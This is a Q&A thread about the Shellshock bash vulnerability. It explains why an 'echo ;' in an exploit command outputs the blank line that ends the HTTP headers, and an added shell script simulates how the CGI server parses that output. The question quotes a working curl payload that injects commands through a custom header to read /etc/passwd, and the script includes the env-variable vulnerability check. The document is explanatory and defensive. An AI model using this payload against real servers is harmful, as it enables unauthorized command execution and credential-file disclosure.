
I was reviewing a shellshock attack and didn't understand this piece of code:

curl -v http://localhost/cgi-bin/shellshock.cgi -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "

The part that I don't understand is the function of the echo ; in the command actually executed on the remote machine, between echoing the Content-Type and running /bin/cat on /etc/passwd.

What is the function of echo ; here?

Thanks.

henry
  • This `echo` produces an empty line required by HTTP specification, which separates the headers from the body. But why is it all under the `-H` switch? –  Jan 20 '18 at 01:38
  • @tomasz, I think your answer was correct and you should undelete it. `-H` is how you get curl to pass a custom header through, which is how the vulnerability works. – Michael Homer Jan 20 '18 at 01:45
  • @tomasz, IIRC, custom HTTP headers like that show up as environment variables to a CGI script, and the issue with Shellshock is exactly that Bash executes code from envvars that start with the `()` marker (`custom` being the name of the header here). So, the code to be executed has to be part of the header, and hence within the argument to `-H` – ilkkachu Jan 20 '18 at 07:52

1 Answer


This is how HTTP is built. There has to be an empty line after the HTTP header. That's what the lonely echo produces.

Compare these two:

echo Content-Type: text/html; echo ; /bin/cat /etc/passwd

and:

echo Content-Type: text/html; /bin/cat /etc/passwd

Now it should be obvious what echo ; is for. (The semicolon separates commands, of course.)

  • The real question is why isn't it Content-Type: text/plain. I'm going to make my /etc/passwd into a javascript exploit! Eat that! – jdwolf Jan 20 '18 at 01:19
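The following script is an added example, not part of the question, the answer or the comments above. It plays the server side of the curl command: it shows how the header name `custom` is turned into the CGI environment variable the script's bash sees, and how a CGI-capable web server splits the script's stdout at the first empty line, so that the two command strings compared in the answer produce a body in one case and no body at all in the other. The passwd lines are constructed sample data standing in for /etc/passwd, and the function names (`cgi_env_name`, `cgi_headers`, `cgi_body`, `with_blank`, `without_blank`, `shellshock_check`) are this example's own. It also runs the well-known local check for the original Shellshock bug, which on a patched bash prints nothing from the injected command.

```shell
#!/bin/sh
# Added example (not from the original post). Simulates the server side of the
# curl command: how the custom header becomes a CGI environment variable, and
# how a CGI web server splits the script's output into headers and body.
# The passwd contents below are constructed sample data standing in for
# /etc/passwd; the real file is never read.

SAMPLE_PASSWD=$(mktemp)
trap 'rm -f "$SAMPLE_PASSWD"' EXIT
printf 'root:x:0:0:root:/root:/bin/bash\nhenry:x:1000:1000::/home/henry:/bin/sh\n' > "$SAMPLE_PASSWD"

# RFC 3875 rule for request headers: prefix HTTP_, uppercase, '-' becomes '_'.
# This is why bash inside the CGI process sees a variable named HTTP_CUSTOM whose
# value starts with "() {", the marker that an unpatched bash treated as a function.
cgi_env_name() {
    printf 'HTTP_%s\n' "$(printf '%s' "$1" | tr 'a-z' 'A-Z' | tr '-' '_')"
}

# What the web server does with the script's stdout (RFC 3875 section 6):
# every line up to the first empty line is a header, everything after it is the body.
cgi_headers() { awk 'NF == 0 { exit } { print }'; }
cgi_body()    { awk 'found { print; next } NF == 0 { found = 1 }'; }

# The two command strings compared in the answer, with the sample file in place
# of /etc/passwd.
with_blank()    { echo Content-Type: text/html; echo ; cat "$SAMPLE_PASSWD"; }
without_blank() { echo Content-Type: text/html; cat "$SAMPLE_PASSWD"; }

# Canonical local check for the original Shellshock bug (CVE-2014-6271): a
# patched bash does not execute the command trailing the function definition.
shellshock_check() {
    command -v bash >/dev/null 2>&1 || { echo "bash not installed"; return; }
    if env custom='() { :; }; echo VULNERABLE' bash -c ':' 2>/dev/null | grep -q VULNERABLE; then
        echo "bash is vulnerable"
    else
        echo "bash is patched"
    fi
}

echo "header 'custom' reaches the CGI script as: $(cgi_env_name custom)"
echo "--- with 'echo ;' the server sees one header and the file as the body:"
with_blank | cgi_body
echo "--- without it every passwd line is taken as another header and the body is empty:"
without_blank | cgi_headers
echo "--- body lines without the blank line: $(without_blank | cgi_body | wc -l | tr -d ' ')"
shellshock_check
```

Run it with `sh script.sh`. The header block printed for the `without_blank` case is exactly the failure mode the answer describes: the server parses `root:x:0:0:...` as a header named `root`, never finds the end of the headers, and the attacker gets an empty response body even though cat ran.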